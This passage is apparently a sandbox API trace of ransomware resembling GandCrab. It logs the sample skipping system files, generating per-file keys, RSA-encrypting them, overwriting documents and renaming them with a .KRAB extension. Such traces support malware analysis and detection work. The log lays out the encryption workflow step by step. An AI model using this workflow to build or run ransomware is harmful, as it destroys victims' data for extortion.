lpString1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\fEXHt9X87hw5FTqPcrNK\\x5rBOxA2\\rd0j9efZtIGt\\N3LNN9Eg\\sPy97gpP.odt") returned="C:\\Users\\CIiHmnxMn6Ps\\Documents\\fEXHt9X87hw5FTqPcrNK\\x5rBOxA2\\rd0j9efZtIGt\\N3LNN9Eg\\sPy97gpP.odt" [0090.302] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0090.302] wsprintfW (in: param_1=0x2f30000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\fEXHt9X87hw5FTqPcrNK\\x5rBOxA2\\rd0j9efZtIGt\\N3LNN9Eg\\sPy97gpP.odt.KRAB") returned 101 [0090.303] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\fEXHt9X87hw5FTqPcrNK\\x5rBOxA2\\rd0j9efZtIGt\\N3LNN9Eg\\sPy97gpP.odt") returned 96 [0090.303] lstrlenW (lpString=".odt") returned 4 [0090.303] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0090.303] wsprintfW (in: param_1=0x2f50000, param_2="%s " | out: param_1=".odt ") returned 5 [0090.303] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0090.303] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\fEXHt9X87hw5FTqPcrNK\\x5rBOxA2\\rd0j9efZtIGt\\N3LNN9Eg\\sPy97gpP.odt") returned 96 [0090.303] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\fEXHt9X87hw5FTqPcrNK\\x5rBOxA2\\rd0j9efZtIGt\\N3LNN9Eg\\sPy97gpP.odt") returned 96 [0090.304] lstrcmpiW (lpString1="sPy97gpP.odt", lpString2="desktop.ini") returned 1 [0090.304] lstrcmpiW (lpString1="sPy97gpP.odt", lpString2="autorun.inf") returned 1 [0090.304] lstrcmpiW (lpString1="sPy97gpP.odt", lpString2="ntuser.dat") returned 1 [0090.304] lstrcmpiW (lpString1="sPy97gpP.odt", lpString2="iconcache.db") returned 1 [0090.304] lstrcmpiW (lpString1="sPy97gpP.odt", lpString2="bootsect.bak") returned 1 [0090.304] lstrcmpiW (lpString1="sPy97gpP.odt", lpString2="boot.ini") returned 1 [0090.304] lstrcmpiW (lpString1="sPy97gpP.odt", lpString2="ntuser.dat.log") returned 1 [0090.304] lstrcmpiW (lpString1="sPy97gpP.odt", lpString2="thumbs.db") returned -1 [0090.304] lstrcmpiW (lpString1="sPy97gpP.odt", lpString2="KRAB-DECRYPT.html") returned 1 [0090.304] lstrcmpiW (lpString1="sPy97gpP.odt", lpString2="KRAB-DECRYPT.txt") returned 1 [0090.304] lstrcmpiW (lpString1="sPy97gpP.odt", lpString2="CRAB-DECRYPT.txt") returned 1 [0090.304] lstrcmpiW (lpString1="sPy97gpP.odt", lpString2="ntldr") returned 1 [0090.304] lstrcmpiW (lpString1="sPy97gpP.odt", lpString2="NTDETECT.COM") returned 1 [0090.304] lstrcmpiW (lpString1="sPy97gpP.odt", lpString2="Bootfont.bin") returned 1 [0090.304] VirtualAlloc (lpAddress=0x0, dwSize=0x208, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0090.305] CryptAcquireContextW (in: phProv=0x338e734, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338e734*=0x10111b0) returned 1 [0090.306] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x3000000 [0090.307] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0090.307] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0090.307] CryptGenRandom (in: hProv=0x10111b0, dwLen=0x20, pbBuffer=0x338e7cc | out: pbBuffer=0x338e7cc) returned 1 [0090.307] CryptReleaseContext (hProv=0x10111b0, dwFlags=0x0) returned 1 [0090.307] VirtualFree (lpAddress=0x3000000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0090.308] CryptAcquireContextW (in: phProv=0x338e734, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338e734*=0x1010c60) returned 1 [0090.309] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x3000000 [0090.310] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0090.310] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0090.310] CryptGenRandom (in: hProv=0x1010c60, dwLen=0x8, pbBuffer=0x338e7ec | out: pbBuffer=0x338e7ec) returned 1 [0090.310] CryptReleaseContext (hProv=0x1010c60, dwFlags=0x0) returned 1 [0090.310] VirtualFree (lpAddress=0x3000000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0090.311] CryptAcquireContextW (in: phProv=0x338e72c, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338e72c*=0x1010bd8) returned 1 [0090.313] CryptImportKey (in: hProv=0x1010bd8, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338e730 | out: phKey=0x338e730*=0x10235f8) returned 1 [0090.313] CryptGetKeyParam (in: hKey=0x10235f8, dwParam=0x8, pbData=0x338e724, pdwDataLen=0x338e728, dwFlags=0x0 | out: pbData=0x338e724*=0x800, pdwDataLen=0x338e728*=0x4) returned 1 [0090.313] CryptEncrypt (in: hKey=0x10235f8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f50000*, pdwDataLen=0x338e75c*=0xc8, dwBufLen=0x100 | out: pbData=0x2f50000*, pdwDataLen=0x338e75c*=0x100) returned 1 [0090.313] GetLastError () returned 0x0 [0090.313] CryptDestroyKey (hKey=0x10235f8) returned 1 [0090.313] CryptReleaseContext (hProv=0x1010bd8, dwFlags=0x0) returned 1 [0090.313] CryptAcquireContextW (in: phProv=0x338e72c, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338e72c*=0x1010bd8) returned 1 [0090.315] CryptImportKey (in: hProv=0x1010bd8, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338e730 | out: phKey=0x338e730*=0x10231f8) returned 1 [0090.315] CryptGetKeyParam (in: hKey=0x10231f8, dwParam=0x8, pbData=0x338e724, pdwDataLen=0x338e728, dwFlags=0x0 | out: pbData=0x338e724*=0x800, pdwDataLen=0x338e728*=0x4) returned 1 [0090.315] CryptEncrypt (in: hKey=0x10231f8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f50100*, pdwDataLen=0x338e75c*=0xc8, dwBufLen=0x100 | out: pbData=0x2f50100*, pdwDataLen=0x338e75c*=0x100) returned 1 [0090.315] GetLastError () returned 0x0 [0090.315] CryptDestroyKey (hKey=0x10231f8) returned 1 [0090.315] CryptReleaseContext (hProv=0x1010bd8, dwFlags=0x0) returned 1 [0090.315] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Documents\\fEXHt9X87hw5FTqPcrNK\\x5rBOxA2\\rd0j9efZtIGt\\N3LNN9Eg\\sPy97gpP.odt" (normalized: "c:\\users\\ciihmnxmn6ps\\documents\\fexht9x87hw5ftqpcrnk\\x5rboxa2\\rd0j9efztigt\\n3lnn9eg\\spy97gpp.odt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x774 [0090.316] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x3870000 [0090.316] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x3b80000 [0090.317] ReadFile (in: hFile=0x774, lpBuffer=0x3870000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338e7fc, lpOverlapped=0x0 | out: lpBuffer=0x3870000*, lpNumberOfBytesRead=0x338e7fc*=0xbb8b, lpOverlapped=0x0) returned 1 [0090.339] SetFilePointerEx (in: hFile=0x774, liDistanceToMove=0xffff4475, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0090.339] WriteFile (in: hFile=0x774, lpBuffer=0x3b80000*, nNumberOfBytesToWrite=0xbb8b, lpNumberOfBytesWritten=0x338e7f8, lpOverlapped=0x0 | out: lpBuffer=0x3b80000*, lpNumberOfBytesWritten=0x338e7f8*=0xbb8b, lpOverlapped=0x0) returned 1 [0090.339] WriteFile (in: hFile=0x774, lpBuffer=0x2f50000*, nNumberOfBytesToWrite=0x208, lpNumberOfBytesWritten=0x338e7f8, lpOverlapped=0x0 | out: lpBuffer=0x2f50000*, lpNumberOfBytesWritten=0x338e7f8*=0x208, lpOverlapped=0x0) returned 1 [0090.339] VirtualFree (lpAddress=0x3870000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0090.343] VirtualFree (lpAddress=0x3b80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0090.344] CloseHandle (hObject=0x774) returned 1 [0090.344] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0090.345] MoveFileW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\Documents\\fEXHt9X87hw5FTqPcrNK\\x5rBOxA2\\rd0j9efZtIGt\\N3LNN9Eg\\sPy97gpP.odt" (normalized: "c:\\users\\ciihmnxmn6ps\\documents\\fexht9x87hw5ftqpcrnk\\x5rboxa2\\rd0j9efztigt\\n3lnn9eg\\spy97gpp.odt"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\Documents\\fEXHt9X87hw5FTqPcrNK\\x5rBOxA2\\rd0j9efZtIGt\\N3LNN9Eg\\sPy97gpP.odt.KRAB" (normalized: "c:\\users\\ciihmnxmn6ps\\documents\\fexht9x87hw5ftqpcrnk\\x5rboxa2\\rd0j9efztigt\\n3lnn9eg\\spy97gpp.odt.krab")) returned 1 [0090.346] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0090.346] FindNextFileW (in: hFindFile=0x1023278, lpFindFileData=0x338e850 | out: lpFindFileData=0x338e850) returned 0 [0090.346] FindClose (in: hFindFile=0x1023278 | out: hFindFile=0x1023278) returned 1 [0090.346] CloseHandle (hObject=0x43c) returned 1 [0090.346] FindNextFileW (in: hFindFile=0x1023238, lpFindFileData=0x338ead0 | out: lpFindFileData=0x338ead0) returned 1 [0090.346] lstrcmpW (lpString1="wcCZ9e3gb.xlsx", lpString2=".") returned 1 [0090.346] lstrcmpW (lpString1="wcCZ9e3gb.xlsx", lpString2="..") returned 1 [0090.346] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\fEXHt9X87hw5FTqPcrNK\\x5rBOxA2\\rd0j9efZtIGt\\", lpString2="wcCZ9e3gb.xlsx" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\fEXHt9X87hw5FTqPcrNK\\x5rBOxA2\\rd0j9efZtIGt\\wcCZ9e3gb.xlsx") returned="C:\\Users\\CIiHmnxMn6Ps\\Documents\\fEXHt9X87hw5FTqPcrNK\\x5rBOxA2\\rd0j9efZtIGt\\wcCZ9e3gb.xlsx" [0090.346] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0090.347] wsprintfW (in: param_1=0x2f30000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\fEXHt9X87hw5FTqPcrNK\\x5rBOxA2\\rd0j9efZtIGt\\wcCZ9e3gb.xlsx.KRAB") returned 94 [0090.347] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\fEXHt9X87hw5FTqPcrNK\\x5rBOxA2\\rd0j9efZtIGt\\wcCZ9e3gb.xlsx") returned 89 [0090.347] lstrlenW (lpString=".xlsx") returned 5 [0090.347] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0090.347] wsprintfW (in: param_1=0x2f50000, param_2="%s " | out: param_1=".xlsx ") returned 6 [0090.347] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0090.348] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\fEXHt9X87hw5FTqPcrNK\\x5rBOxA2\\rd0j9efZtIGt\\wcCZ9e3gb.xlsx") returned 89 [0090.348] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\fEXHt9X87hw5FTqPcrNK\\x5rBOxA2\\rd0j9efZtIGt\\wcCZ9e3gb.xlsx") returned 89 [0090.348] lstrcmpiW (lpString1="wcCZ9e3gb.xlsx", lpString2="desktop.ini") returned 1 [0090.348] lstrcmpiW (lpString1="wcCZ9e3gb.xlsx", lpString2="autorun.inf") returned 1 [0090.348] lstrcmpiW (lpString1="wcCZ9e3gb.xlsx", lpString2="ntuser.dat") returned 1 [0090.348] lstrcmpiW (lpString1="wcCZ9e3gb.xlsx", lpString2="iconcache.db") returned 1 [0090.348] lstrcmpiW (lpString1="wcCZ9e3gb.xlsx", lpString2="bootsect.bak") returned 1 [0090.348] lstrcmpiW (lpString1="wcCZ9e3gb.xlsx", lpString2="boot.ini") returned 1 [0090.348] lstrcmpiW (lpString1="wcCZ9e3gb.xlsx", lpString2="ntuser.dat.log") returned 1 [0090.348] lstrcmpiW (lpString1="wcCZ9e3gb.xlsx", lpString2="thumbs.db") returned 1 [0090.348] lstrcmpiW (lpString1="wcCZ9e3gb.xlsx", lpString2="KRAB-DECRYPT.html") returned 1 [0090.348] lstrcmpiW (lpString1="wcCZ9e3gb.xlsx", lpString2="KRAB-DECRYPT.txt") returned 1 [0090.348] lstrcmpiW (lpString1="wcCZ9e3gb.xlsx", lpString2="CRAB-DECRYPT.txt") returned 1 [0090.348] lstrcmpiW (lpString1="wcCZ9e3gb.xlsx", lpString2="ntldr") returned 1 [0090.348] lstrcmpiW (lpString1="wcCZ9e3gb.xlsx", lpString2="NTDETECT.COM") returned 1 [0090.348] lstrcmpiW (lpString1="wcCZ9e3gb.xlsx", lpString2="Bootfont.bin") returned 1 [0090.348] VirtualAlloc (lpAddress=0x0, dwSize=0x208, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0090.349] CryptAcquireContextW (in: phProv=0x338e9b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338e9b4*=0x1011898) returned 1 [0090.351] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x3000000 [0090.352] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0090.352] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0090.352] CryptGenRandom (in: hProv=0x1011898, dwLen=0x20, pbBuffer=0x338ea4c | out: pbBuffer=0x338ea4c) returned 1 [0090.352] CryptReleaseContext (hProv=0x1011898, dwFlags=0x0) returned 1 [0090.352] VirtualFree (lpAddress=0x3000000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0090.352] CryptAcquireContextW (in: phProv=0x338e9b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338e9b4*=0x10113d0) returned 1 [0090.354] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x3000000 [0090.355] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0090.355] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0090.355] CryptGenRandom (in: hProv=0x10113d0, dwLen=0x8, pbBuffer=0x338ea6c | out: pbBuffer=0x338ea6c) returned 1 [0090.355] CryptReleaseContext (hProv=0x10113d0, dwFlags=0x0) returned 1 [0090.355] VirtualFree (lpAddress=0x3000000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0090.356] CryptAcquireContextW (in: phProv=0x338e9ac, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338e9ac*=0x1010bd8) returned 1 [0090.358] CryptImportKey (in: hProv=0x1010bd8, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338e9b0 | out: phKey=0x338e9b0*=0x10231f8) returned 1 [0090.358] CryptGetKeyParam (in: hKey=0x10231f8, dwParam=0x8, pbData=0x338e9a4, pdwDataLen=0x338e9a8, dwFlags=0x0 | out: pbData=0x338e9a4*=0x800, pdwDataLen=0x338e9a8*=0x4) returned 1 [0090.358] CryptEncrypt (in: hKey=0x10231f8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f50000*, pdwDataLen=0x338e9dc*=0xc8, dwBufLen=0x100 | out: pbData=0x2f50000*, pdwDataLen=0x338e9dc*=0x100) returned 1 [0090.358] GetLastError () returned 0x0 [0090.359] CryptDestroyKey (hKey=0x10231f8) returned 1 [0090.359] CryptReleaseContext (hProv=0x1010bd8, dwFlags=0x0) returned 1 [0090.359] CryptAcquireContextW (in: phProv=0x338e9ac, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338e9ac*=0x10111b0) returned 1 [0090.363] CryptImportKey (in: hProv=0x10111b0, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338e9b0 | out: phKey=0x338e9b0*=0x10231f8) returned 1 [0090.363] CryptGetKeyParam (in: hKey=0x10231f8, dwParam=0x8, pbData=0x338e9a4, pdwDataLen=0x338e9a8, dwFlags=0x0 | out: pbData=0x338e9a4*=0x800, pdwDataLen=0x338e9a8*=0x4) returned 1 [0090.363] CryptEncrypt (in: hKey=0x10231f8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f50100*, pdwDataLen=0x338e9dc*=0xc8, dwBufLen=0x100 | out: pbData=0x2f50100*, pdwDataLen=0x338e9dc*=0x100) returned 1 [0090.363] GetLastError () returned 0x0 [0090.364] CryptDestroyKey (hKey=0x10231f8) returned 1 [0090.364] CryptReleaseContext (hProv=0x10111b0, dwFlags=0x0) returned 1 [0090.364] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Documents\\fEXHt9X87hw5FTqPcrNK\\x5rBOxA2\\rd0j9efZtIGt\\wcCZ9e3gb.xlsx" (normalized: "c:\\users\\ciihmnxmn6ps\\documents\\fexht9x87hw5ftqpcrnk\\x5rboxa2\\rd0j9efztigt\\wccz9e3gb.xlsx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x43c [0090.364] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x3870000 [0090.366] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x3b80000 [0090.366] ReadFile (in: hFile=0x43c, lpBuffer=0x3870000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338ea7c, lpOverlapped=0x0 | out: lpBuffer=0x3870000*, lpNumberOfBytesRead=0x338ea7c*=0x11ad, lpOverlapped=0x0) returned 1 [0090.491] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0xffffee53, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0090.491] WriteFile (in: hFile=0x43c, lpBuffer=0x3b80000*, nNumberOfBytesToWrite=0x11ad, lpNumberOfBytesWritten=0x338ea78, lpOverlapped=0x0 | out: lpBuffer=0x3b80000*, lpNumberOfBytesWritten=0x338ea78*=0x11ad, lpOverlapped=0x0) returned 1 [0090.492] WriteFile (in: hFile=0x43c, lpBuffer=0x2f50000*, nNumberOfBytesToWrite=0x208, lpNumberOfBytesWritten=0x338ea78, lpOverlapped=0x0 | out: lpBuffer=0x2f50000*, lpNumberOfBytesWritten=0x338ea78*=0x208, lpOverlapped=0x0) returned 1 [0090.492] VirtualFree (lpAddress=0x3870000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0090.496] VirtualFree (lpAddress=0x3b80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0090.497] CloseHandle (hObject=0x43c) returned 1 [0090.497] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0090.497] MoveFileW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\Documents\\fEXHt9X87hw5FTqPcrNK\\x5rBOxA2\\rd0j9efZtIGt\\wcCZ9e3gb.xlsx" (normalized: "c:\\users\\ciihmnxmn6ps\\documents\\fexht9x87hw5ftqpcrnk\\x5rboxa2\\rd0j9efztigt\\wccz9e3gb.xlsx"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\Documents\\fEXHt9X87hw5FTqPcrNK\\x5rBOxA2\\rd0j9efZtIGt\\wcCZ9e3gb.xlsx.KRAB" (normalized: "c:\\users\\ciihmnxmn6ps\\documents\\fexht9x87hw5ftqpcrnk\\x5rboxa2\\rd0j9efztigt\\wccz9e3gb.xlsx.krab")) returned 1 [0090.498] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0090.498] FindNextFileW (in: hFindFile=0x1023238, lpFindFileData=0x338ead0 | out: lpFindFileData=0x338ead0) returned 1 [0090.498] lstrcmpW (lpString1="X1BRjpVn-eHUMucU.doc", lpString2=".") returned 1 [0090.498] lstrcmpW (lpString1="X1BRjpVn-eHUMucU.doc", lpString2="..") returned 1 [0090.498] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\fEXHt9X87hw5FTqPcrNK\\x5rBOxA2\\rd0j9efZtIGt\\", lpString2="X1BRjpVn-eHUMucU.doc" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\fEXHt9X87hw5FTqPcrNK\\x5rBOxA2\\rd0j9efZtIGt\\X1BRjpVn-eHUMucU.doc") returned="C:\\Users\\CIiHmnxMn6Ps\\Documents\\fEXHt9X87hw5FTqPcrNK\\x5rBOxA2\\rd0j9efZtIGt\\X1BRjpVn-eHUMucU.doc" [0090.498] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0090.499] wsprintfW (in: param_1=0x2f30000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\fEXHt9X87hw5FTqPcrNK\\x5rBOxA2\\rd0j9efZtIGt\\X1BRjpVn-eHUMucU.doc.KRAB") returned 100 [0090.499] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\fEXHt9X87hw5FTqPcrNK\\x5rBOxA2\\rd0j9efZtIGt\\X1BRjpVn-eHUMucU.doc") returned 95 [0090.499] lstrlenW (lpString=".doc") returned 4 [0090.499] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0090.499] wsprintfW (in: param_1=0x2f50000, param_2="%s " | out: param_1=".doc ") returned 5 [0090.499] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0090.500] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\fEXHt9X87hw5FTqPcrNK\\x5rBOxA2\\rd0j9efZtIGt\\X1BRjpVn-eHUMucU.doc") returned 95 [0090.500] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\fEXHt9X87hw5FTqPcrNK\\x5rBOxA2\\rd0j9efZtIGt\\X1BRjpVn-eHUMucU.doc") returned 95 [0090.500] lstrcmpiW (lpString1="X1BRjpVn-eHUMucU.doc", lpString2="desktop.ini") returned 1 [0090.500] lstrcmpiW (lpString1="X1BRjpVn-eHUMucU.doc", lpString2="autorun.inf") returned 1 [0090.500] lstrcmpiW (lpString1="X1BRjpVn-eHUMucU.doc", lpString2="ntuser.dat") returned 1 [0090.500] lstrcmpiW (lpString1="X1BRjpVn-eHUMucU.doc", lpString2="iconcache.db") returned 1 [0090.500] lstrcmpiW (lpString1="X1BRjpVn-eHUMucU.doc", lpString2="bootsect.bak") returned 1 [0090.500] lstrcmpiW (lpString1="X1BRjpVn-eHUMucU.doc", lpString2="boot.ini") returned 1 [0090.500] lstrcmpiW (lpString1="X1BRjpVn-eHUMucU.doc", lpString2="ntuser.dat.log") returned 1 [0090.500] lstrcmpiW (lpString1="X1BRjpVn-eHUMucU.doc", lpString2="thumbs.db") returned 1 [0090.500] lstrcmpiW (lpString1="X1BRjpVn-eHUMucU.doc", lpString2="KRAB-DECRYPT.html") returned 1 [0090.500] lstrcmpiW (lpString1="X1BRjpVn-eHUMucU.doc", lpString2="KRAB-DECRYPT.txt") returned 1 [0090.500] lstrcmpiW (lpString1="X1BRjpVn-eHUMucU.doc", lpString2="CRAB-DECRYPT.txt") returned 1 [0090.500] lstrcmpiW (lpString1="X1BRjpVn-eHUMucU.doc", lpString2="ntldr") returned 1 [0090.500] lstrcmpiW (lpString1="X1BRjpVn-eHUMucU.doc", lpString2="NTDETECT.COM") returned 1 [0090.500] lstrcmpiW (lpString1="X1BRjpVn-eHUMucU.doc", lpString2="Bootfont.bin") returned 1 [0090.500] VirtualAlloc (lpAddress=0x0, dwSize=0x208, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0090.501] CryptAcquireContextW (in: phProv=0x338e9b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338e9b4*=0x1011898) returned 1 [0090.502] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x3000000 [0090.503] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0090.503] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0090.503] CryptGenRandom (in: hProv=0x1011898, dwLen=0x20, pbBuffer=0x338ea4c | out: pbBuffer=0x338ea4c) returned 1 [0090.503] CryptReleaseContext (hProv=0x1011898, dwFlags=0x0) returned 1 [0090.503] VirtualFree (lpAddress=0x3000000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0090.504] CryptAcquireContextW (in: phProv=0x338e9b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338e9b4*=0x1010f08) returned 1 [0090.506] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x3000000 [0090.506] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0090.506] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0090.507] CryptGenRandom (in: hProv=0x1010f08, dwLen=0x8, pbBuffer=0x338ea6c | out: pbBuffer=0x338ea6c) returned 1 [0090.507] CryptReleaseContext (hProv=0x1010f08, dwFlags=0x0) returned 1 [0090.507] VirtualFree (lpAddress=0x3000000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0090.508] CryptAcquireContextW (in: phProv=0x338e9ac, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338e9ac*=0x1011018) returned 1 [0090.509] CryptImportKey (in: hProv=0x1011018, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338e9b0 | out: phKey=0x338e9b0*=0x10235f8) returned 1 [0090.509] CryptGetKeyParam (in: hKey=0x10235f8, dwParam=0x8, pbData=0x338e9a4, pdwDataLen=0x338e9a8, dwFlags=0x0 | out: pbData=0x338e9a4*=0x800, pdwDataLen=0x338e9a8*=0x4) returned 1 [0090.509] CryptEncrypt (in: hKey=0x10235f8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f50000*, pdwDataLen=0x338e9dc*=0xc8, dwBufLen=0x100 | out: pbData=0x2f50000*, pdwDataLen=0x338e9dc*=0x100) returned 1 [0090.510] GetLastError () returned 0x0 [0090.510] CryptDestroyKey (hKey=0x10235f8) returned 1 [0090.510] CryptReleaseContext (hProv=0x1011018, dwFlags=0x0) returned 1 [0090.510] CryptAcquireContextW (in: phProv=0x338e9ac, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338e9ac*=0x1011898) returned 1 [0090.511] CryptImportKey (in: hProv=0x1011898, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338e9b0 | out: phKey=0x338e9b0*=0x10231f8) returned 1 [0090.511] CryptGetKeyParam (in: hKey=0x10231f8, dwParam=0x8, pbData=0x338e9a4, pdwDataLen=0x338e9a8, dwFlags=0x0 | out: pbData=0x338e9a4*=0x800, pdwDataLen=0x338e9a8*=0x4) returned 1 [0090.511] CryptEncrypt (in: hKey=0x10231f8, hHash=0x0, Final=1, 